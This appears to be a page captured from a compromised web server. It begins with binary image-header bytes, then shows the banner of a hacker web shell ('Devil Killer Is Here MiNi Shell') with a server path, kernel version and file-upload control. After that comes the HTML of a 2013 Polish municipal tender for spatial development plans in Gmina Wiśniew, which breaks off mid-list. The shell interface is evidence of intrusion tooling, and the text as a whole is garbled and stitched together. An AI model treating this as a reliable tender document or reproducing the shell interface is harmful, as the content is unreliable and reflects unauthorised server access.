JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130723/289120-N-2013.html

<p class="kh_header"><b>Wiśniew: Sporządzenie miejscowych planów zagospodarowania przestrzennego dla części gminy Wiśniew w zadaniach.</b><br>
<b>Numer ogłoszenia: 289120 - 2013; data zamieszczenia: 23.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiśniew , ul. Siedlecka 13, 08-112 Wiśniew, woj. mazowieckie, tel. 0 25 641 73 13, faks 0 25 641 73 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wisniew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie miejscowych planów zagospodarowania przestrzennego dla części gminy Wiśniew w zadaniach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie usługi polegającej na sporządzeniu miejscowych planów zagospodarowania przestrzennego dla części gminy Wiśniew w trzech zadaniach.
Zakres rzeczowy zamówienia dla każdego z wyżej wymienionych zadań obejmuje:
1)	sporządzenie opracowań ekofizjograficznych cech poszczególnych elementów przyrodniczych i ich wzajemnych powiązań - 4 kpl. w wersji papierowej, 1 kpl. w wersji elektronicznej w formacie *.pdf, 1 kpl. w wersji elektronicznej w formacie *.doc,
2)	opracowanie projektu miejscowego planu zagospodarowania przestrzennego (część tekstowa i graficzna) - 4 kpl. w wersji papierowej, 1 kpl. w wersji elektronicznej w formacie *.pdf, 1 kpl. części graficznej w wersji elektronicznej w postaci wektorowej bazy danych przestrzennych (GIS),
3)	opracowanie prognozy oddziaływania na środowisko - 4 kpl. w wersji papierowej, 1 kpl. w wersji elektronicznej w formacie *.pdf, 1 kpl. w wersji elektronicznej w formacie *.doc,
4)	opracowanie prognozy skutków finansowych uchwalenia planu - 4 kpl. w wersji papierowej, 1 kpl. w wersji elektronicznej w formacie *.pdf, 1 kpl. w wersji elektronicznej w formacie *.doc.

Mapy niezbędne do wykonania projektów miejscowych planów zagospodarowania przestrzennego zapewni Zamawiający.

Wchodzące w zakres zamówienia opracowania należy wykonać, a procedury przeprowadzić zgodnie z obowiązującymi przepisami, a w szczególności z: 
1)	ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. z 2012 r., poz. 647, późn. zm.), 
2)	ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227, z późn. zm.),
3)	ustawą z dnia 27 kwietnia 2001 r. - Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150, z późn. zm.),
4)	ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U. z 2013 r., poz. 627, z późn. zm.),
5)	ustawą z dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych (Dz.U. z 2004 r. Nr 121, poz. 1266, z późn. zm.),
6)	rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r., w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. z 2003 r., Nr 164, poz. 1587), 
7)	rozporządzeniem Ministra Środowiska z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych (Dz.U. z 2002 r. Nr 155, poz. 1298),
8)	rozporządzeniem Ministra Infrastruktury z dnia 7 maja 2004 r. w sprawie sposobu uwzględniania w zagospodarowaniu przestrzennym potrzeb obronności i bezpieczeństwa państwa (Dz.U. z 2004 r. Nr 125, poz. 1309)
oraz innymi przepisami szczegółowymi.

W ramach realizacji przedmiotu zamówienia w przypadku każdego zadania wykonawca zobowiązany jest do opracowania wszelkich dokumentów i przeprowadzenia wszelkich procedur niezbędnych do uchwalenia miejscowego planu zagospodarowania przestrzennego, a w szczególności: 
1)	opracowywania wzoru obwieszczenia i ogłoszenia prasowego o przystąpieniu do sporządzenia miejscowego planu zagospodarowania przestrzennego,
2)	zebrania materiałów źródłowych i opracowania innych materiałów wejściowych do projektowania,
3)	wykonania opracowań ekofizjograficznych z uwzględnieniem powiązań przyrodniczych z otoczeniem,
4)	ustalenia przeznaczenia terenów (w tym dla inwestycji celu publicznego) oraz określenia sposobów ich zagospodarowania i zabudowy na obszarze opracowania,
5)	wykonania analizy wniosków do projektu opracowania planu, opracowania propozycji ich rozpatrzenia, 
6)	opracowania wykazu odpowiedzi oraz stanowisk organów i instytucji zawiadomionych o podjęciu uchwały o przystąpieniu do sporządzenia planu wraz z ich analizą oraz sposobem rozpatrzenia w przypadku organów opiniujących,
7)	opracowania graficznego analizy wniosków do planu z przedstawieniem stanu istniejącego i wnioskowanego,
8)	opracowania w formie opisowej i graficznej wytycznych oraz wskazań do projektu planu,
9)	przedstawienia koncepcji projektu planu do akceptacji przez władze Gminy, 
10)	opracowania projektu planu miejscowego z uwzględnieniem uwag władz Gminy
11)	opracowania prognozy oddziaływania na środowisko, 
12)	opracowania prognozy skutków finansowych uchwalenia planu miejscowego, 
13)	przedstawienia projektu planu miejscowego wraz z całą dokumentacją do zaopiniowania przez Gminną Komisję Urbanistyczno-Architektonicznej,
14)	analizy potrzeby opracowania wniosków, a w razie potrzeby przygotowania wniosków o uzyskanie zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne,
15)	przygotowania projektu planu do opiniowania i uzgodnień,
16)	przygotowania wystąpień o uzgodnienia i opinie do projektu planu kierowanych do wymaganych organów i instytucji,
17)	przygotowania wykazu uzyskanych uzgodnień i opinii do projektu planu wraz z analizą oraz propozycją dotyczącą sposobu i zakresu ich uwzględnienia,
18)	dokonania zmian w projekcie planu i innych dokumentach wynikających z procedury uzgadniania i opiniowania projektu planu w porozumieniu z władzami Gminy,
19)	opracowania projektów obwieszczenia i ogłoszenia prasowego o wyłożeniu projektu planu miejscowego wraz z prognozą oddziaływania na środowisko, do publicznego wglądu oraz o dyskusji publicznej, 
20)	przeprowadzenia procedury wyłożenia do publicznego wglądu projektu planu wraz z prognozą oddziaływania na środowisko; udziału w procedurze wyłożenia projektu planu miejscowego (minimum 1 raz w tygodniu), 
21)	przygotowania i udziału w dyskusji publicznej nad przyjętymi w projekcie planu miejscowego rozwiązaniami; przygotowania protokołu z dyskusji publicznej,
22)	sporządzenia wykazu uwag wniesionych do wyłożonego do publicznego wglądu projektu planu miejscowego i prognozy oddziaływania na środowisko oraz prognozy skutków finansowych uchwalenia planu miejscowego; analizy tych uwag i opracowania propozycji ich rozpatrzenia, 
23)	udziału w posiedzeniach organów Gminy dotyczących rozpoznania uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu miejscowego i prognozy oddziaływania na środowisko,
24)	wprowadzenia zmian do projektu planu miejscowego, prognozy oddziaływania na środowisko oraz prognozy skutków finansowych wynikających z rozpatrzenia uwag wniesionych po wyłożeniu planu, 
25)	przedstawienia Radzie Gminy projektu miejscowego planu wraz z listą nieuwzględnionych uwag wniesionych po wyłożeniu planu, 
26)	przygotowania projektu uchwały o zgodności projektu planu miejscowego z ustaleniami studium, przygotowania projektu rozstrzygnięcia o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych Gminy oraz zasad ich finansowania, 
27)	przygotowywania projektów innych uchwał Rady Gminy związanych z uchwaleniem planu miejscowego, 
28)	ponownego przeprowadzenia czynności określonych w art. 17 ustawy o planowaniu i zagospodarowaniu przestrzennym projektu planu miejscowego, jeżeli Rada Gminy stwierdzi konieczność dokonania zmiany, w zakresie niezbędnym do dokonania tych zmian (przygotowania projektu wystąpienia o ponownie zaopiniowanie i o ponowne uzgodnienie wraz z rozdzielnikiem oraz kopiami projektu planu miejscowego i prognozy oddziaływania na środowisko, opracowania stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach, przygotowania listy nieuwzględnionych uwag), 
29)	skompletowania, uporządkowania i oprawienia dokumentacji prac planistycznych w ciągu pięciu dni od uchwalenia miejscowego planu zagospodarowania przestrzennego; przygotowania projektu wystąpienia do wojewody w sprawie oceny zgodności z przepisami prawnymi uchwały Rady Gminy wraz z załącznikami,
30)	opracowania uzasadnienia, o którym mowa w art. 42 pkt 2 ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko, a także opracowania podsumowania do miejscowego planu zagospodarowania przestrzennego, o którym mowa w art. 55 ust. 3 tejże ustawy,
31)	przygotowywania potrzebnej ilości materiałów roboczych - odpowiedniej, między innymi do wymaganej ilości uzgodnień, opinii, konsultacji na każdym etapie procedury przygotowania do uchwalenia miejscowego planu zagospodarowania przestrzennego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający nie wyklucza możliwości wystąpienia zamówień uzupełniających o których mowa w art. 67 ust.1 pkt 6 u.Pzp w wielkości 50 % zmówienia podstawowego, w zakresie planowania przestrzennego i zagospodarowania terenu</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5, 71.40.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w przedmiotowym postępowaniu nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku i za jego spełnienie uzna złożone przez Wykonawcę oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji kiedy wykaże, że wykonał w okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedna usługę polegającą na opracowaniu miejscowego planu zagospodarowania przestrzennego dla obszaru o powierzchni minimum 8 ha i wartości minimum 8.000 złotych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku i za jego spełnienie uzna złożone przez Wykonawcę oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji kiedy wykaże, że dysponuje minimum jedną osobą posiadającą uprawnienia urbanistyczne do projektowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku i za jego spełnienie uzna złożone przez Wykonawcę oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą nastąpić w następujących okolicznościach:
1)	 wystąpienia siły wyższej wobec którejkolwiek ze stron, o charakterze niezależnym, której nie można było przewidzieć przed zawarciem umowy, której nie można było uniknąć ani zapobiec przy zachowaniu należytej staranności; za siłę wyższą warunkującą zmianę umowy uważa się w szczególności:
a)	powódź, pożar i inne klęski żywiołowe,
b)	zamieszki i strajki,
c)	ataki terrorystyczne i działania wojenne,
d)	nagłe załamania warunków atmosferycznych,
e)	nagłe i często występujące lub długotrwałe przerwy w dostawie energii elektrycznej,
f)	promieniowanie lub skażenie,
2)	wykonania umowy przed terminem - zmiana umowy w zakresie terminu wykonania przedmiotu zamówienia,
3)	zmiany podwykonawców,
4)	zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmiana umowy w zakresie terminu wykonania przedmiotu zamówienia,
5)	 w przypadku przewidzianym w art. 19 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tj. Dz.U. z 2012 r., poz. 647 z późn. zm.) - termin wykonania przedmiotu umowy ulegnie przedłużeniu o czas niezbędny do ponowienia czynności, o których mowa w art. 17, w zakresie niezbędnym do dokonania tych zmian,
6)	w razie przedłużającego się postępowania administracyjnego o udzielenie uzgodnienia; zgody, opinii, porozumienia bądź przedłużającego się postępowania, które kończy się wydaniem decyzji administracyjnej - termin wykonania przedmiotu umowy przedłuża się o czas odpowiadający długości przedłużającego się postępowania, w stosunku do przewidzianego przepisami prawa;
7)	w przypadku niepodjęcia danej uchwały przez Radę Gminy w terminie 60 dni od dnia przekazania projektu uchwały - termin wykonania przedmiotu umowy przedłuża się o czas odpowiadający długości przedłużającej się procedury legislacyjnej uchwalenia planu przez Radę Gminy;
8)	w razie zmiany stanu prawnego w zakresie dotyczącym przedmiotu umowy - termin wykonania przedmiotu umowy przedłuża się o czas niezbędny na wprowadzenie tych zmian;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wisniew.e-bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiśniew
ul. Siedlecka 13
08-112 Wiśniew
pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 10:00, miejsce: Urząd Gminy Wiśniew
ul. Siedlecka 13
08-112 Wiśniew
pokój nr 8 - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Sporządzenie miejscowego planu zagospodarowania przestrzennego dla części wsi Nowe Okniny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawą opracowania planu jest uchwała Nr XII/75/2011 Rady Gminy Wiśniew z dnia 28 grudnia 2011 roku w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla części wsi Nowe Okniny. Uchwała została umieszczona w załączniku nr 7_A_1 do niniejszej specyfikacji. Obszar objęty projektem planu zajmuje powierzchnię około 12 ha. 
Część obszaru objęta projektem planu stanowi teren powierzchniowej eksploatacji kruszywa naturalnego i zabudowy mieszkaniowo-usługowej, dla którego obowiązuje miejscowy plan zagospodarowania przestrzennego przyjęty uchwałą Nr X/62/03 Rady Gminy Wiśniew z dnia 21 października 2003 r. Część tekstowa planu z 2003 r. stanowi załącznik nr 7_A_2 do niniejszej specyfikacji, a część graficzna - załącznik nr 7_A_3.
Nową propozycję przeznaczenia terenów oraz określenie sposobów ich zagospodarowania i zabudowy zawiera wniosek inwestorów, który stanowi załącznik nr 7_A_4 do niniejszej specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5, 71.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Sporządzenie miejscowego planu zagospodarowania przestrzennego dla części miejscowości: Helenów, Borki - Kosiorki, Borki - Paduchy, Borki - Sołdy położonych na terenie gminy Wiśniew..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawą opracowania planu jest uchwała Nr XXVIII/205/2013 Rady Gminy Wiśniew z dnia 27 czerwca 2013 roku w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla części miejscowości: Helenów, Borki-Kosiorki, Boki-Paduchy, Borki-Sołdy położonych na terenie gminy Wiśniew. Uchwała została umieszczona w załączniku nr 7_B do niniejszej specyfikacji. Obszar objęty projektem planu zajmuje powierzchnię około 335 ha.
Obecne oraz projektowane przeznaczenie terenów oraz określenie sposobów ich zagospodarowania zawiera studium uwarunkowań i kierunków zagospodarowania gminy Wiśniew. Znaczna część obszaru objęta projektem planu stanowi teren lokalizacji i oddziaływania elektrowni wiatrowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5, 71.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Sporządzenie miejscowego planu zagospodarowania przestrzennego dla części miejscowości Wiśniew położonej na terenie gminy Wiśniew..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawą opracowania planu jest uchwała Nr XXVIII/206/2013 Rady Gminy Wiśniew z dnia 27 czerwca 2013 roku w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla części miejscowości Wiśniew położonej na terenie gminy Wiśniew. Uchwała została umieszczona w załączniku nr 7_C do niniejszej specyfikacji. Obszar objęty projektem planu zajmuje powierzchnię około 416 ha.
Obecne oraz projektowane przeznaczenie terenów oraz określenie sposobów ich zagospodarowania zawiera studium uwarunkowań i kierunków zagospodarowania gminy Wiśniew..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5, 71.40.00.00-2.</p></li>
